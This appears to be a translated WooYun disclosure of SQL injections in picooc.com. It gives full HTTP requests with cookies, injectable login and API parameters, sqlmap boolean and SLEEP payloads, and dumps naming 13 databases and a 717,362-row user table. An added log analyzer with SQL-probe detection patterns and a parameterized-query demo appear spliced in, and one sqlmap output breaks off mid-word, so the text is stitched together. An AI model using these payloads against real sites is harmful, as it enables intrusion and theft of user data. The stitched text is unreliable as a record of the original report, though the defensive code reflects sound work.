
Vulnerability summary

Defect ID: WooYun-2015-123773

Title: Multiple SQL injections on Youpin (picooc.com), bundled into one submission (at least 13 databases, 710,000+ user records affected)

Vendor: picooc.com

Author: 天地不仁 以万物为刍狗

Submitted: 2015-07-01 09:49

Published: 2015-08-15 09:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact help@wooyun.org

Tags: none



Vulnerability details

Disclosure status:

2015-07-01: Details sent to the vendor; awaiting vendor handling
2015-07-01: Vendor has confirmed; details disclosed to the vendor only
2015-07-11: Details disclosed to core white hats and domain experts
2015-07-21: Details disclosed to regular white hats
2015-07-31: Details disclosed to intern white hats
2015-08-15: Details disclosed to the public

Summary:

Heaven and earth are not benevolent; they treat all things as straw dogs.

[HD] In the team's name and for personal honour, building network security together

Details:

1.

POST request:

Code:
POST /picooc/admin/login.php HTTP/1.1
Content-Length: 99
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.picooc.com:80/
Cookie: PHPSESSID=5rqj5m2e3vgj1d5uk82sp596q6; Hm_lvt_973df559cb578de9c3c4b8c03b1a03a0=1435657707,1435657720,1435657731,1435657733; Hm_lpvt_973df559cb578de9c3c4b8c03b1a03a0=1435657733; HMACCOUNT=50E0F9300006484F
Host: www.picooc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

login=login&password=admin&username=admin





The username parameter is injectable; this injection point dumps faster than the previous one.



[Image: 0.png]





[Image: 1.png]





So I dumped the picooc database (96 tables).



[Image: 4.png]





I saw a user table and counted its rows: 717362. I'd like to ask, is that dayima_id what I think it is?



[Image: 3.png]



Code:
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 531 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: login=login&password=admin&username=admin' AND 2537=2537 AND 'dGBa'='dGBa

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: login=login&password=admin&username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))AWel) AND 'sutb'='sutb
---
[18:43:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5.0.12
[18:43:41] [INFO] fetching database names
[18:43:41] [INFO] fetching number of databases
[18:43:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:43:41] [INFO] retrieved: 13
[18:43:43] [INFO] retrieved: information_schema
[18:43:59] [INFO] retrieved: cdcol
[18:44:05] [INFO] retrieved: geo
[18:44:08] [INFO] retrieved: mysql
[18:44:13] [INFO] retrieved: performance_schema
[18:44:34] [INFO] retrieved: picooc
[18:44:43] [INFO] retrieved: picooc_bak
[18:44:56] [INFO] retrieved: picooc_bbs
[18:45:04] [INFO] retrieved: picooc_cms
[18:45:12] [INFO] retrieved: picooc_dev
[18:45:20] [INFO] retrieved: picooc_pms
[18:45:27] [INFO] retrieved: picooc_www
[18:45:33] [INFO] retrieved: test
available databases [13]:
[*] cdcol
[*] geo
[*] information_schema
[*] mysql
[*] performance_schema
[*] picooc
[*] picooc_bak
[*] picooc_bbs
[*] picooc_cms
[*] picooc_dev
[*] picooc_pms
[*] picooc_www
[*] test

[18:45:44] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.picooc.com'

[*] shutting down at 18:45:44



2. http://www.picooc.com/picooc/web_interface/?last_id=1&method=ditu&ver=99



The last_id parameter is injectable.



[Image: 0.png]







Code:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: last_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: last_id=1 AND 4846=4846&method=ditu&ver=99
---
[19:22:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5
[19:22:10] [INFO] fetching database names
[19:22:10] [INFO] fetching number of databases
[19:22:10] [INFO] resumed: 13
[19:22:10] [INFO] resumed: information_schema
[19:22:10] [INFO] resumed: cdcol
[19:22:10] [INFO] resumed: geo
[19:22:10] [INFO] resumed: m
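The sqlmap runs above leave two signals a defender can look for in web-server logs: the probe strings themselves (boolean tautologies such as `AND 4846=4846`, and MySQL `SLEEP(5)` delays) and the request volume automated testing produces (hundreds of requests to one endpoint from one client). The following is an added example, not part of the report and not the vendor's code: a small log analyzer run over constructed access-log lines. It assumes the nginx "combined" log format with `$request_time` appended, uses documentation IP ranges, and the sample lines are constructed to resemble the `last_id` probe on item 2, not captured traffic.

```python
"""Flag blind SQL injection probes in web-server access logs.
Log format assumed: nginx "combined" with $request_time appended (constructed)."""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<rt>[\d.]+)$'
)
# Boolean tautology / contradiction probes: "AND 4846=4846", "OR 1=2".
BOOLEAN_RE = re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*(\d+)\b", re.I)
# MySQL time-based probe functions.
TIME_RE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)

# Constructed sample log (documentation IP ranges; not the vendor's traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [30/Jun/2015:19:22:10 +0800] "GET /picooc/web_interface/?last_id=1&method=ditu&ver=99 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.012
203.0.113.5 - - [30/Jun/2015:19:22:11 +0800] "GET /picooc/web_interface/?last_id=1%20AND%204846%3D4846&method=ditu&ver=99 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.014
203.0.113.5 - - [30/Jun/2015:19:22:12 +0800] "GET /picooc/web_interface/?last_id=1%20AND%204846%3D4847&method=ditu&ver=99 HTTP/1.1" 200 41 "-" "Mozilla/5.0" 0.013
203.0.113.5 - - [30/Jun/2015:19:22:20 +0800] "GET /picooc/web_interface/?last_id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))x)&method=ditu&ver=99 HTTP/1.1" 200 41 "-" "Mozilla/5.0" 5.021
198.51.100.9 - - [30/Jun/2015:19:23:00 +0800] "GET /picooc/web_interface/?last_id=42&method=ditu&ver=99 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.011
"""


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one access-log line; None if it does not match the assumed format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry: Dict[str, object] = m.groupdict()
    entry["rt"] = float(m.group("rt"))
    entry["decoded"] = unquote_plus(m.group("path"))  # inspect the decoded query string
    return entry


def classify(entry: Dict[str, object], slow_threshold: float = 4.0) -> List[str]:
    """Return the reasons a single request looks like an injection probe."""
    reasons: List[str] = []
    query = str(entry["decoded"])
    if BOOLEAN_RE.search(query):
        reasons.append("boolean-tautology")
    if TIME_RE.search(query):
        reasons.append("time-based-function")
        # The delay actually fired server-side: stronger evidence than the string alone.
        if float(entry["rt"]) >= slow_threshold:
            reasons.append("delay-observed")
    return reasons


def analyze(log_text: str, probe_threshold: int = 3) -> Tuple[List[Dict[str, object]], List[str]]:
    """Return (suspicious requests, client IPs with at least probe_threshold of them)."""
    findings: List[Dict[str, object]] = []
    per_ip: Counter = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            per_ip[str(entry["ip"])] += 1
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "query": entry["decoded"], "reasons": reasons})
    sources = sorted(ip for ip, n in per_ip.items() if n >= probe_threshold)
    return findings, sources


if __name__ == "__main__":
    hits, sources = analyze(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["ts"], h["reasons"], h["query"])
    print("automated probing from:", sources)  # ['203.0.113.5']
```

One caveat: the POST bodies used against login.php and action.php (items 1 and 3) do not appear in a standard access log at all, so for those endpoints the only server-side signal is the request duration (`delay-observed`) and the burst of requests from one client; capturing request bodies at the application or WAF layer is needed to see the payload itself.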

Proof of vulnerability:

3. POST request:

Code:
POST /cmsadmin/php/action.php HTTP/1.1
Content-Length: 106
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.picooc.com:80/
Cookie: PHPSESSID=5rqj5m2e3vgj1d5uk82sp596q6; Hm_lvt_973df559cb578de9c3c4b8c03b1a03a0=1435657707,1435657720,1435657731,1435657733; Hm_lpvt_973df559cb578de9c3c4b8c03b1a03a0=1435657733; HMACCOUNT=50E0F9300006484F
Host: www.picooc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

action=login&password=-1&username=wsirjsba





Both the password and username parameters are injectable; password is used for the demonstration here.



[Image: 0.png]





13 databases; dumping them is too slow, so I did not continue.



[Image: 1.png]



Code:
sqlmap identified the following injection points with a total of 422 HTTP(s) requests:
---
Parameter: password (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=login&password=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))EBvX) AND 'ZBYC'='ZBYC&username=wsirjsba
---
[18:38:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5.0.12
[18:38:14] [INFO] fetching database names
[18:38:14] [INFO] fetching number of databases
[18:38:14] [INFO] retrieved:
[18:38:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
13
[18:38:35] [INFO] retrieved: ii
[18:39:09] [INFO] retrieved:
[18:39:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:39:09] [INFO] retrieved:
[18:39:48] [ERROR] invalid character detected. retrying..
geo
[18:41:00] [INFO] retrieved: mysql
[18:42:47] [INFO] retrieved:

Fix recommendation:
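The report leaves this section empty. As an added illustration (not the author's text and not the vendor's code), the following shows the defect class behind all three findings and its fix: a string parameter (username, password) spliced into SQL text, and an integer parameter (last_id) used without type validation, each beside a version that binds the value as a parameter. SQLite in memory stands in for the MySQL backend; the table and column names `admin_user` and `map_point`, and the assumption that login.php looks the user up by name before checking the password, are mine. The boolean payload is the one printed in the sqlmap output above; its "false" twin (2538 instead of 2537) is constructed to show the true/false oracle that blind injection relies on.

```python
"""Vulnerable-versus-hardened query construction for the three injection points in
the report: string parameters (username, password) and the integer parameter last_id.
SQLite in memory stands in for the MySQL backend; schema and names are assumed."""
import sqlite3
from typing import List, Optional

# Boolean-based payload exactly as printed in the report's sqlmap output, and a
# constructed "false" twin (2538 instead of 2537) to show the true/false oracle.
TRUE_PAYLOAD = "admin' AND 2537=2537 AND 'dGBa'='dGBa"
FALSE_PAYLOAD = "admin' AND 2537=2538 AND 'dGBa'='dGBa"


def build_db() -> sqlite3.Connection:
    """Constructed sample data (assumed schema, not the vendor's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_user (id INTEGER PRIMARY KEY, username TEXT)")
    conn.execute("INSERT INTO admin_user VALUES (1, 'admin')")
    conn.execute("CREATE TABLE map_point (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO map_point VALUES (?, ?)", [(1, "a"), (2, "b"), (3, "c")])
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> List[int]:
    # The defect class the report implies for login.php / action.php: the request
    # parameter is spliced into the SQL text, so a quote in it becomes SQL syntax
    # and the injected condition decides whether a row comes back (the oracle).
    sql = "SELECT id FROM admin_user WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn: sqlite3.Connection, username: str) -> List[int]:
    # Bound parameter: the whole string is compared as data, never parsed as SQL,
    # so the injected AND ... clause is just part of a name that matches nothing.
    sql = "SELECT id FROM admin_user WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def points_after_vulnerable(conn: sqlite3.Connection, last_id: str) -> List[int]:
    # Numeric context (web_interface?last_id=...): no quote is even needed;
    # "1 AND 4846=4846" is accepted verbatim, matching the sqlmap payload above.
    sql = "SELECT id FROM map_point WHERE id > " + last_id
    return [row[0] for row in conn.execute(sql)]


def points_after_safe(conn: sqlite3.Connection, last_id: str) -> Optional[List[int]]:
    # Validate the type first, then bind. Anything that is not an integer is
    # rejected (None here; an HTTP 400 in a real handler).
    try:
        n = int(last_id, 10)
    except ValueError:
        return None
    sql = "SELECT id FROM map_point WHERE id > ?"
    return [row[0] for row in conn.execute(sql, (n,))]


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, true  :", find_user_vulnerable(db, TRUE_PAYLOAD))        # [1]
    print("vulnerable, false :", find_user_vulnerable(db, FALSE_PAYLOAD))       # []
    print("safe, payload     :", find_user_safe(db, TRUE_PAYLOAD))              # []
    print("safe, real name   :", find_user_safe(db, "admin"))                   # [1]
    print("last_id vulnerable:", points_after_vulnerable(db, "1 AND 4846=4846"))  # [2, 3]
    print("last_id safe      :", points_after_safe(db, "1 AND 4846=4846"))       # None
```

The vulnerable functions return a row for the "true" payload and nothing for the "false" one, which is exactly the one-bit difference sqlmap used to read 13 database names and the 717362-row count one character at a time; the bound-parameter versions return the same (empty) result for both, so the oracle disappears. In the PHP application the equivalent is `mysqli` or PDO prepared statements for every query that takes request input, plus an integer cast or validation for `last_id`; blocking the `SLEEP` time-based variant needs no separate fix, since it depends on the same string splicing.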

Copyright notice: when reposting, please credit the source: 天地不仁 以万物为刍狗@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed at: 2015-07-01 09:52

Vendor reply:

Thanks

Latest status:

None yet



Comments

  1. 2015-07-01 09:50 | 天地不仁 以万物为刍狗 ( Regular white hat | Rank:1377 Vulnerabilities:356 | Three hundred years as a professional small shop; trust comes from quality assurance ...)

    ···Truly sour··· they bundled mine again····

  2. 2015-07-01 10:24 | 染血の雪 ( Regular white hat | Rank:247 Vulnerabilities:35 | Whether you dig or not, the bugs are right there; they will neither increase nor...)

    That's what you get for splitting them up to farm rank.
